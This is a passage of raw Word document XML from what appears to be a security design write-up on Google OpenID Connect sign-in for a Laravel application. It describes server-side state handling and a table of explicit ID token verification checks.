                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="333375" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="336005" y="0"/>
                                  <a:pt x="338250" y="930"/>
                                  <a:pt x="340110" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="341970" y="4638"/>
                                  <a:pt x="342900" y="6896"/>
                                  <a:pt x="342900" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="342900" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="342900" y="135979"/>
                                  <a:pt x="341970" y="138212"/>
                                  <a:pt x="340110" y="140072"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="338250" y="141932"/>
                                  <a:pt x="336005" y="142863"/>
                                  <a:pt x="3333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83" style="width:27pt;height:11.25pt;position:absolute;z-index:-2147483496;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:101.18pt;mso-position-vertical-relative:text;margin-top:12.0537pt;" coordsize="3429,1428">
                <v:shape id="Shape 2636" style="position:absolute;width:3429;height:1428;left:0;top:0;" coordsize="342900,142875" path="m9525,0l333375,0c336005,0,338250,930,340110,2778c341970,4638,342900,6896,342900,9525l342900,133350c342900,135979,341970,138212,340110,140072c338250,141932,336005,142863,333375,142875l9525,142875c6895,142863,4650,141932,2790,140072c930,138212,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All three are held </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>server-side</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the cache and </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>deleted when consumed</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, so a callback works at most once. The browser carries only the opaque </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>state</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  which</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> means an XSS in the SPA cannot steal anything that would let an attacker complete someone else's sign-in. Given this application </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>had</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> a stored XSS, that is not a hypothetical consideration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708FC9A3" w14:textId="240B22A4"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6.4 ID token </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>verification  eight</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> explicit checks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5737782F" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:spacing w:after="1"/>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6960" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1FB2EEA6" wp14:editId="2E7A0E47">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3256657</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>153082</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1924050" cy="133350"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="31284" name="Group 31284"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1924050" cy="133350"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="1924050" cy="133350"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2649" name="Shape 2649"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1924050" cy="133350"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1924050" h="133350">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1914525" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1917155" y="0"/>
                                  <a:pt x="1919400" y="930"/>
                                  <a:pt x="1921260" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1923119" y="4638"/>
                                  <a:pt x="1924049" y="6896"/>
                                  <a:pt x="1924050" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1924050" y="123825"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1924049" y="126454"/>
                                  <a:pt x="1923119" y="128687"/>
                                  <a:pt x="1921260" y="130547"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1919400" y="132407"/>
                                  <a:pt x="1917155" y="133338"/>
                                  <a:pt x="1914525"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84" style="width:151.5pt;height:10.5pt;position:absolute;z-index:-2147483483;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:256.43pt;mso-position-vertical-relative:text;margin-top:12.0537pt;" coordsize="19240,1333">
                <v:shape id="Shape 2649" style="position:absolute;width:19240;height:1333;left:0;top:0;" coordsize="1924050,133350" path="m9525,0l1914525,0c1917155,0,1919400,930,1921260,2778c1923119,4638,1924049,6896,1924050,9525l1924050,123825c1924049,126454,1923119,128687,1921260,130547c1919400,132407,1917155,133338,1914525,133350l9525,133350c6895,133338,4650,132407,2790,130547c930,128687,0,126454,0,123825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Laravel Socialite would do the code exchange in one line, but </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>it does not verify the ID token</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> — it calls the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>userinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> endpoint instead. The verification </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> the security boundary, so </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>GoogleOidcService</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>verifyIdToken</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> performs it explicitly with</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060A9A97" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="005C54CB" w:rsidRDefault="008125F0">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
        <w:ind w:left="6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17984" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1B828792" wp14:editId="7997B457">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>18157</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-23470</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="990600" cy="142875"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="31285" name="Group 31285"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="990600" cy="142875"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="990600" cy="142875"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="2652" name="Shape 2652"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="990600" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="990600" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="981075" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="983705" y="0"/>
                                  <a:pt x="985950" y="918"/>
                                  <a:pt x="987810" y="2778"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="989670" y="4638"/>
                                  <a:pt x="990600" y="6883"/>
                                  <a:pt x="990600" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="990600" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="990600" y="135979"/>
                                  <a:pt x="989670" y="138212"/>
                                  <a:pt x="987810" y="140072"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="985950" y="141932"/>
                                  <a:pt x="983705" y="142863"/>
                                  <a:pt x="981075" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142863"/>
                                  <a:pt x="4650" y="141932"/>
                                  <a:pt x="2790" y="140072"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="133350"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9525"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2790" y="2778"/>
                                </a:ln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85" style="width:78pt;height:11.25pt;position:absolute;z-index:-2147483480;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:1.42969pt;mso-position-vertical-relative:text;margin-top:-1.84808pt;" coordsize="9906,1428">
                <v:shape id="Shape 2652" style="position:absolute;width:9906;height:1428;left:0;top:0;" coordsize="990600,142875" path="m9525,0l981075,0c983705,0,985950,918,987810,2778c989670,4638,990600,6883,990600,9525l990600,133350c990600,135979,989670,138212,987810,140072c985950,141932,983705,142863,981075,142875l9525,142875c6895,142863,4650,141932,2790,140072l0,133350l0,9525l2790,2778c4650,918,6895,0,9525,0x">
                  <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                  <v:fill on="true" color="#edf2f6"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>firebase/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>php-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>jwt</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p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="10194" w:type="dxa"/>
        <w:tblInd w:w="38" w:type="dxa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:tblCellMar>
          <w:top w:w="96" w:type="dxa"/>
          <w:left w:w="113" w:type="dxa"/>
          <w:right w:w="109" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="324"/>
        <w:gridCol w:w="1769"/>
        <w:gridCol w:w="8101"/>
      </w:tblGrid>
      <w:tr w:rsidR="00345BB3" w:rsidRPr="00674944" w14:paraId="0A3395DD" w14:textId="77777777" w:rsidTr="00674944">
        <w:trPr>
          <w:trHeight w:val="435"/>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5FD93B77"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2BCB2F4E" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="00674944" w:rsidRDefault="008125F0">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="9"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Check</w:t>
            </w:r>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2CE28C78"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Why it matters</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345BB3" w:rsidRPr="00674944" w14:paraId="693CF916" w14:textId="77777777" w:rsidTr="00674944">
        <w:trPr>
          <w:trHeight w:val="675"/>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7808F096"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1</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A029844" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="00674944" w:rsidRDefault="008125F0">
            <w:pPr>
              <w:spacing w:after="36" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="9"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Signature vs</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2098203A" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="00674944" w:rsidRDefault="008125F0">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="9"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Google's JWKS</w:t>
            </w:r>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07191B67"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A JWT is just base64 until its signature is checked</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345BB3" w:rsidRPr="00674944" w14:paraId="33D9B114" w14:textId="77777777" w:rsidTr="00674944">
        <w:trPr>
          <w:trHeight w:val="435"/>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32CA372"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2</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287402E" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="00674944" w:rsidRDefault="008125F0">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="52"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19008" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="4BEE78AC" wp14:editId="16983D1F">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>80963</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>-23650</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="228600" cy="142875"/>
                      <wp:effectExtent l="0" t="0" r="0" b="0"/>
                      <wp:wrapNone/>
                      <wp:docPr id="29486" name="Group 29486"/>
                      <wp:cNvGraphicFramePr/>
                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                        <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                          <wpg:wgp>
                            <wpg:cNvGrpSpPr/>
                            <wpg:grpSpPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="228600" cy="142875"/>
                                <a:chOff x="0" y="0"/>
                                <a:chExt cx="228600" cy="142875"/>
                              </a:xfrm>
                            </wpg:grpSpPr>
                            <wps:wsp>
                              <wps:cNvPr id="2664" name="Shape 2664"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="0" y="0"/>
                                  <a:ext cx="228600" cy="142875"/>
                                </a:xfrm>
                                <a:custGeom>
                                  <a:avLst/>
                                  <a:gdLst/>
                                  <a:ahLst/>
                                  <a:cxnLst/>
                                  <a:rect l="0" t="0" r="0" b="0"/>
                                  <a:pathLst>
                                    <a:path w="228600" h="142875">
                                      <a:moveTo>
                                        <a:pt x="9525" y="0"/>
                                      </a:moveTo>
                                      <a:lnTo>
                                        <a:pt x="219075" y="0"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="221705" y="0"/>
                                        <a:pt x="223950" y="918"/>
                                        <a:pt x="225810" y="2778"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="227670" y="4638"/>
                                        <a:pt x="228600" y="6883"/>
                                        <a:pt x="228600" y="9525"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="228600" y="133350"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="228600" y="135979"/>
                                        <a:pt x="227670" y="138212"/>
                                        <a:pt x="225810" y="140072"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="223950" y="141932"/>
                                        <a:pt x="221705" y="142863"/>
                                        <a:pt x="219075" y="142875"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="9525" y="142875"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="6895" y="142863"/>
                                        <a:pt x="4650" y="141932"/>
                                        <a:pt x="2790" y="140072"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="930" y="138212"/>
                                        <a:pt x="0" y="135979"/>
                                        <a:pt x="0" y="133350"/>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486" style="width:18pt;height:11.25pt;position:absolute;z-index:-2147483468;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:6.375pt;mso-position-vertical-relative:text;margin-top:-1.8623pt;" coordsize="2286,1428">
                      <v:shape id="Shape 2664" style="position:absolute;width:2286;height:1428;left:0;top:0;" coordsize="228600,142875" path="m9525,0l219075,0c221705,0,223950,918,225810,2778c227670,4638,228600,6883,228600,9525l228600,133350c228600,135979,227670,138212,225810,140072c223950,141932,221705,142863,219075,142875l9525,142875c6895,142863,4650,141932,2790,140072c930,138212,0,135979,0,133350l0,9525c0,6883,930,4638,2790,2778c4650,918,6895,0,9525,0x">
                        <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                        <v:fill on="true" color="#edf2f6"/>
                      </v:shape>
                    </v:group>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00674944">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>iss</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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9B5F08A"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Confirms Google minted it, not another provider</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00345BB3" w:rsidRPr="00674944" w14:paraId="7FEB4A08" w14:textId="77777777" w:rsidTr="00674944">
        <w:trPr>
          <w:trHeight w:val="675"/>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416B2907"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3</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4711C670" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRPr="00674944" w:rsidRDefault="008125F0">
            <w:pPr>
              <w:spacing w:after="0" w:line="259" w:lineRule="auto"/>
              <w:ind w:left="0" w:right="12" w:firstLine="0"/>
              <w:jc w:val="center"/>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0032" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="696D918C" wp14:editId="2B75860C">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="column">
                        <wp:posOffset>80963</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="paragraph">
                        <wp:posOffset>-20278</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="228600" cy="133350"/>
                      <wp:effectExtent l="0" t="0" r="0" b="0"/>
                      <wp:wrapNone/>
                      <wp:docPr id="29577" name="Group 29577"/>
                      <wp:cNvGraphicFramePr/>
                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                        <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                          <wpg:wgp>
                            <wpg:cNvGrpSpPr/>
                            <wpg:grpSpPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="228600" cy="133350"/>
                                <a:chOff x="0" y="0"/>
                                <a:chExt cx="228600" cy="133350"/>
                              </a:xfrm>
                            </wpg:grpSpPr>
                            <wps:wsp>
                              <wps:cNvPr id="2668" name="Shape 2668"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="0" y="0"/>
                                  <a:ext cx="228600" cy="133350"/>
                                </a:xfrm>
                                <a:custGeom>
                                  <a:avLst/>
                                  <a:gdLst/>
                                  <a:ahLst/>
                                  <a:cxnLst/>
                                  <a:rect l="0" t="0" r="0" b="0"/>
                                  <a:pathLst>
                                    <a:path w="228600" h="133350">
                                      <a:moveTo>
                                        <a:pt x="9525" y="0"/>
                                      </a:moveTo>
                                      <a:lnTo>
                                        <a:pt x="219075" y="0"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="221705" y="0"/>
                                        <a:pt x="223950" y="930"/>
                                        <a:pt x="225810" y="2778"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="227670" y="4638"/>
                                        <a:pt x="228600" y="6896"/>
                                        <a:pt x="228600" y="9525"/>
                                      </a:cubicBezTo>
                                      <a:lnTo>
                                        <a:pt x="228600" y="123825"/>
                                      </a:lnTo>
                                      <a:cubicBezTo>
                                        <a:pt x="228600" y="126454"/>
                                        <a:pt x="227670" y="128687"/>
                                        <a:pt x="225810" y="130547"/>
                                      </a:cubicBezTo>
                                      <a:cubicBezTo>
                                        <a:pt x="223950" y="132407"/>
                                        <a:pt x="221705" y="133338"/>
                                        <a:pt x="219075"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577" style="width:18pt;height:10.5pt;position:absolute;z-index:-2147483464;mso-position-horizontal-relative:text;mso-position-horizontal:absolute;margin-left:6.375pt;mso-position-vertical-relative:text;margin-top:-1.59674pt;" coordsize="2286,1333">
                      <v:shape id="Shape 2668" style="position:absolute;width:2286;height:1333;left:0;top:0;" coordsize="228600,133350" path="m9525,0l219075,0c221705,0,223950,930,225810,2778c227670,4638,228600,6896,228600,9525l228600,123825c228600,126454,227670,128687,225810,130547c223950,132407,221705,133338,219075,133350l9525,133350c6895,133338,4650,132407,2790,130547c930,128687,0,126454,0,123825l0,9525c0,6896,930,4638,2790,2778c4650,930,6895,0,9525,0x">
                        <v:stroke weight="0pt" endcap="flat" joinstyle="miter" miterlimit="10" on="false" color="#000000" opacity="0"/>
                        <v:fill on="true" color="#edf2f6"/>
                      </v:shape>
                    </v:group>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00674944">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>aud</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00674944">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
